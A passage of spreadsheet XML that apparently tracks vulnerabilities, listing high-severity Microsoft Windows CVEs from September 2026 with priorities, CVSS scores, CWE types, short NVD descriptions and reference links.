t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G580" s="5" t="inlineStr" /><c r="H580" s="5" t="n"><v>0.003</v></c><c r="I580" s="5" t="inlineStr" /><c r="J580" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K580" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L580" s="5" t="inlineStr" /><c r="M580" s="5" t="inlineStr" /><c r="N580" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O580" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P580" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q580" s="5" t="inlineStr" /><c r="R580" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S580" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T580" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70569</t></is></c></row><row r="581"><c r="A581" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B581" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C581" s="5" t="inlineStr"><is><t>CVE-2026-70572</t></is></c><c r="D581" s="5" t="n"><v>7.8</v></c><c r="E581" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F581" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G581" s="5" t="inlineStr" /><c r="H581" s="5" t="n"><v>0.003</v></c><c r="I581" s="5" t="inlineStr" /><c r="J581" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K58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81" s="5" t="inlineStr" /><c r="M581" s="5" t="inlineStr" /><c r="N581" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O581" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P581" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q581" s="5" t="inlineStr" /><c r="R581" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S581" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T581" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70572</t></is></c></row><row r="582"><c r="A582" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B582" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C582" s="5" t="inlineStr"><is><t>CVE-2026-70574</t></is></c><c r="D582" s="5" t="n"><v>7.8</v></c><c r="E582" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F582" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G582" s="5" t="inlineStr" /><c r="H582" s="5" t="n"><v>0.003</v></c><c r="I582" s="5" t="inlineStr" /><c r="J582" s="5" t="inlineStr" /><c r="K582" s="5" t="inlineStr" /><c r="L582" s="5" t="inlineStr" /><c r="M582" s="5" t="inlineStr" /><c r="N582" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O582" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P582" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q582" s="5" t="inlineStr" /><c r="R582" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S582" s="5" t="inlineStr"><is><t>Out-of-bounds read in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T582" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70574</t></is></c></row><row r="583"><c r="A583" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B583" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C583" s="5" t="inlineStr"><is><t>CVE-2026-70581</t></is></c><c r="D583" s="5" t="n"><v>7.8</v></c><c r="E583" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F583" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G583" s="5" t="inlineStr" /><c r="H583" s="5" t="n"><v>0.003</v></c><c r="I583" s="5" t="inlineStr" /><c r="J583" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K58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83" s="5" t="inlineStr" /><c r="M583" s="5" t="inlineStr" /><c r="N583" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O583" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P583" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q583" s="5" t="inlineStr" /><c r="R583" s="5" t="inlineStr"><is><t>CWE-190, CWE-20</t></is></c><c r="S583" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T583" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70581</t></is></c></row><row r="584"><c r="A584" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B584" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C584" s="5" t="inlineStr"><is><t>CVE-2026-70583</t></is></c><c r="D584" s="5" t="n"><v>7.8</v></c><c r="E584" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F584" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G584" s="5" t="inlineStr" /><c r="H584" s="5" t="n"><v>0.003</v></c><c r="I584" s="5" t="inlineStr" /><c r="J584" s="5" t="inlineStr" /><c r="K584" s="5" t="inlineStr" /><c r="L584" s="5" t="inlineStr" /><c r="M584" s="5" t="inlineStr" /><c r="N584" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O584" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P584" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q584" s="5" t="inlineStr" /><c r="R584" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S584" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Core Messaging allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T584" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70583</t></is></c></row><row r="585"><c r="A585" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B585" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C585" s="5" t="inlineStr"><is><t>CVE-2026-70584</t></is></c><c r="D585" s="5" t="n"><v>7.8</v></c><c r="E585" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F585" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G585" s="5" t="inlineStr" /><c r="H585" s="5" t="n"><v>0.003</v></c><c r="I585" s="5" t="inlineStr" /><c r="J585" s="5" t="inlineStr" /><c r="K585" s="5" t="inlineStr" /><c r="L585" s="5" t="inlineStr" /><c r="M585" s="5" t="inlineStr" /><c r="N585" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O585" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P585" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q585" s="5" t="inlineStr" /><c r="R585" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="S585" s="5" t="inlineStr"><is><t>Access of resource using incompatible type ('type confusion') in Windows Core Messaging allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T585" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70584</t></is></c></row><row r="586"><c r="A586" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B586" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C586" s="5" t="inlineStr"><is><t>CVE-2026-71334</t></is></c><c r="D586" s="5" t="n"><v>7.8</v></c><c r="E586" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F586" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G586" s="5" t="inlineStr" /><c r="H586" s="5" t="n"><v>0.002</v></c><c r="I586" s="5" t="inlineStr" /><c r="J586" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K58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86" s="5" t="inlineStr" /><c r="M586" s="5" t="inlineStr" /><c r="N586" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O586" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P586" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q586" s="5" t="inlineStr" /><c r="R586" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S586" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows NFS Portmapper allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T586" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71334</t></is></c></row><row r="587"><c r="A587" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B587" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C587" s="5" t="inlineStr"><is><t>CVE-2026-71337</t></is></c><c r="D587" s="5" t="n"><v>7.8</v></c><c r="E587" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F587" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G587" s="5" t="inlineStr" /><c r="H587" s="5" t="n"><v>0.003</v></c><c r="I587" s="5" t="inlineStr" /><c r="J587" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K587" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L587" s="5" t="inlineStr" /><c r="M587" s="5" t="inlineStr" /><c r="N587" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O587" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P587" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q587" s="5" t="inlineStr" /><c r="R587" s="5" t="inlineStr"><is><t>CWE-121, CWE-130</t></is></c><c r="S587" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows Storage Management Provider allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T587" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71337</t></is></c></row><row r="588"><c r="A588" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B588" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C588" s="5" t="inlineStr"><is><t>CVE-2026-71343</t></is></c><c r="D588" s="5" t="n"><v>7.8</v></c><c r="E588" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F588" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G588" s="5" t="inlineStr" /><c r="H588" s="5" t="n"><v>0.003</v></c><c r="I588" s="5" t="inlineStr" /><c r="J588" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K58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88" s="5" t="inlineStr" /><c r="M588" s="5" t="inlineStr" /><c r="N588" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O588" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P588" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q588" s="5" t="inlineStr" /><c r="R588" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S588" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Remote Access Connection Manager allows an authorized attacker to execute code locally.</t></is></c><c r="T588" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71343</t></is></c></row><row r="589"><c r="A589" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B589" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C589" s="5" t="inlineStr"><is><t>CVE-2026-71345</t></is></c><c r="D589" s="5" t="n"><v>7.8</v></c><c r="E589" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F589" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G589" s="5" t="inlineStr" /><c r="H589" s="5" t="n"><v>0.003</v></c><c r="I589" s="5" t="inlineStr" /><c r="J589" s="5" t="inlineStr" /><c r="K589" s="5" t="inlineStr" /><c r="L589" s="5" t="inlineStr" /><c r="M589" s="5" t="inlineStr" /><c r="N589" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O589" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P589" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q589" s="5" t="inlineStr" /><c r="R589" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S589" s="5" t="inlineStr"><is><t>Out-of-bounds write in Windows Spaceport.sys allows an authorized attacker to execute code locally.</t></is></c><c r="T589" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71345</t></is></c></row><row r="590"><c r="A590" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B590" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C590" s="5" t="inlineStr"><is><t>CVE-2026-72929</t></is></c><c r="D590" s="5" t="n"><v>7.8</v></c><c r="E590" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F590" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G590" s="5" t="inlineStr" /><c r="H590" s="5" t="n"><v>0.002</v></c><c r="I590" s="5" t="inlineStr" /><c r="J590" s="5" t="inlineStr" /><c r="K590" s="5" t="inlineStr" /><c r="L590" s="5" t="inlineStr" /><c r="M590" s="5" t="inlineStr" /><c r="N590" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O590" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P590" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q590" s="5" t="inlineStr" /><c r="R590" s="5" t="inlineStr"><is><t>CWE-354</t></is></c><c r="S590" s="5" t="inlineStr"><is><t>Improper validation of integrity check value in Windows Installer allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T590" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72929</t></is></c></row><row r="591"><c r="A591" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B591" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C591" s="5" t="inlineStr"><is><t>CVE-2026-72941</t></is></c><c r="D591" s="5" t="n"><v>7.8</v></c><c r="E591" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F591" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G591" s="5" t="inlineStr" /><c r="H591" s="5" t="n"><v>0.003</v></c><c r="I591" s="5" t="inlineStr" /><c r="J591" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K59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91" s="5" t="inlineStr" /><c r="M591" s="5" t="inlineStr" /><c r="N591" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O591" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P591" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q591" s="5" t="inlineStr" /><c r="R591" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S591" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T591" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72941</t></is></c></row><row r="592"><c r="A592" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B592" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C592" s="5" t="inlineStr"><is><t>CVE-2026-72944</t></is></c><c r="D592" s="5" t="n"><v>7.8</v></c><c r="E592" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F592" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G592" s="5" t="inlineStr" /><c r="H592" s="5" t="n"><v>0.003</v></c><c r="I592" s="5" t="inlineStr" /><c r="J592" s="5" t="inlineStr" /><c r="K592" s="5" t="inlineStr" /><c r="L592" s="5" t="inlineStr" /><c r="M592" s="5" t="inlineStr" /><c r="N592" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O592" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P592" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q592" s="5" t="inlineStr" /><c r="R592" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S592" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Fax Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T592" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72944</t></is></c></row><row r="593"><c r="A593" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B593" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C593" s="5" t="inlineStr"><is><t>CVE-2026-72946</t></is></c><c r="D593" s="5" t="n"><v>7.8</v></c><c r="E593" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F593" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G593" s="5" t="inlineStr" /><c r="H593" s="5" t="n"><v>0.003</v></c><c r="I593" s="5" t="inlineStr" /><c r="J593" s="5" t="inlineStr" /><c r="K593" s="5" t="inlineStr" /><c r="L593" s="5" t="inlineStr" /><c r="M593" s="5" t="inlineStr" /><c r="N593" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O593" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P593" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q593" s="5" t="inlineStr" /><c r="R593" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S593" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Storage Port Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T593" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72946</t></is></c></row><row r="594"><c r="A594" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B594" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C594" s="5" t="inlineStr"><is><t>CVE-2026-72953</t></is></c><c r="D594" s="5" t="n"><v>7.8</v></c><c r="E594" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F594" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G594" s="5" t="inlineStr" /><c r="H594" s="5" t="n"><v>0.003</v></c><c r="I594" s="5" t="inlineStr" /><c r="J594" s="5" t="inlineStr" /><c r="K594" s="5" t="inlineStr" /><c r="L594" s="5" t="inlineStr" /><c r="M594" s="5" t="inlineStr" /><c r="N594" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O594" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P594" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q594" s="5" t="inlineStr" /><c r="R594" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S594" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows USB Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T594" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72953</t></is></c></row><row r="595"><c r="A595" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B595" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C595" s="5" t="inlineStr"><is><t>CVE-2026-72957</t></is></c><c r="D595" s="5" t="n"><v>7.8</v></c><c r="E595" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F595" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G595" s="5" t="inlineStr" /><c r="H595" s="5" t="n"><v>0.003</v></c><c r="I595" s="5" t="inlineStr" /><c r="J595" s="5" t="inlineStr" /><c r="K595" s="5" t="inlineStr" /><c r="L595" s="5" t="inlineStr" /><c r="M595" s="5" t="inlineStr" /><c r="N595" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O595" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P595" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q595" s="5" t="inlineStr" /><c r="R595" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S595" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Deployment Services allows an authorized attacker to execute code locally.</t></is></c><c r="T595" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72957</t></is></c></row><row r="596"><c r="A596" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B596" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C596" s="5" t="inlineStr"><is><t>CVE-2026-72965</t></is></c><c r="D596" s="5" t="n"><v>7.8</v></c><c r="E596" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F596" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G596" s="5" t="inlineStr" /><c r="H596" s="5" t="n"><v>0.003</v></c><c r="I596" s="5" t="inlineStr" /><c r="J596" s="5" t="inlineStr" /><c r="K596" s="5" t="inlineStr" /><c r="L596" s="5" t="inlineStr" /><c r="M596" s="5" t="inlineStr" /><c r="N596" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O596" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P596" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q596" s="5" t="inlineStr" /><c r="R596" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S596" s="5" t="inlineStr"><is><t>Use after free in Windows WebClient Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T596" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72965</t></is></c></row><row r="597"><c r="A597" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B597" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C597" s="5" t="inlineStr"><is><t>CVE-2026-72967</t></is></c><c r="D597" s="5" t="n"><v>7.8</v></c><c r="E597" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F597" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G597" s="5" t="inlineStr" /><c r="H597" s="5" t="n"><v>0.003</v></c><c r="I597" s="5" t="inlineStr" /><c r="J597" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K59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97" s="5" t="inlineStr" /><c r="M597" s="5" t="inlineStr" /><c r="N597" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O597" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P597" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q597" s="5" t="inlineStr" /><c r="R597" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S597" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Network Connection Broker allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T597" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72967</t></is></c></row><row r="598"><c r="A598" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B598" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C598" s="5" t="inlineStr"><is><t>CVE-2026-72988</t></is></c><c r="D598" s="5" t="n"><v>7.8</v></c><c r="E598" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F598" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G598" s="5" t="inlineStr" /><c r="H598" s="5" t="n"><v>0.002</v></c><c r="I598" s="5" t="inlineStr" /><c r="J598" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K59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98" s="5" t="inlineStr" /><c r="M598" s="5" t="inlineStr" /><c r="N598" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O598" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P598" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q598" s="5" t="inlineStr" /><c r="R598" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S598" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T598" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72988</t></is></c></row><row r="599"><c r="A599" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B599" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C599" s="5" t="inlineStr"><is><t>CVE-2026-72990</t></is></c><c r="D599" s="5" t="n"><v>7.8</v></c><c r="E599" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F599" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G599" s="5" t="inlineStr" /><c r="H599" s="5" t="n"><v>0.003</v></c><c r="I599" s="5" t="inlineStr" /><c r="J599" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K59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99" s="5" t="inlineStr" /><c r="M599" s="5" t="inlineStr" /><c r="N599" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O599" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P599" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q599" s="5" t="inlineStr" /><c r="R599" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S599" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T599" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72990</t></is></c></row><row r="600"><c r="A600" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B600" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C600" s="5" t="inlineStr"><is><t>CVE-2026-72991</t></is></c><c r="D600" s="5" t="n"><v>7.8</v></c><c r="E600" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F600" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G600" s="5" t="inlineStr" /><c r="H600" s="5" t="n"><v>0.003</v></c><c r="I600" s="5" t="inlineStr" /><c r="J600" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K60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0" s="5" t="inlineStr" /><c r="M600" s="5" t="inlineStr" /><c r="N600" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O600" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P600" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q600" s="5" t="inlineStr" /><c r="R600" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S600" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T600" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72991</t></is></c></row><row r="601"><c r="A601" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B601" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C601" s="5" t="inlineStr"><is><t>CVE-2026-72992</t></is></c><c r="D601" s="5" t="n"><v>7.8</v></c><c r="E601" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F601" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G601" s="5" t="inlineStr" /><c r="H601" s="5" t="n"><v>0.003</v></c><c r="I601" s="5" t="inlineStr" /><c r="J601" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K60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1" s="5" t="inlineStr" /><c r="M601" s="5" t="inlineStr" /><c r="N601" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O601" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P601" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q601" s="5" t="inlineStr" /><c r="R601" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S601" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T601" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72992</t></is></c></row><row r="602"><c r="A602" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B602" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C602" s="5" t="inlineStr"><is><t>CVE-2026-72993</t></is></c><c r="D602" s="5" t="n"><v>7.8</v></c><c r="E602" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F602" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G602" s="5" t="inlineStr" /><c r="H602" s="5" t="n"><v>0.002</v></c><c r="I602" s="5" t="inlineStr" /><c r="J602" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K6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2" s="5" t="inlineStr" /><c r="M602" s="5" t="inlineStr" /><c r="N602" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O602" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P602" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q602" s="5" t="inlineStr" /><c r="R602" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S602" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T602" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72993</t></is></c></row><row r="603"><c r="A603" s="5" 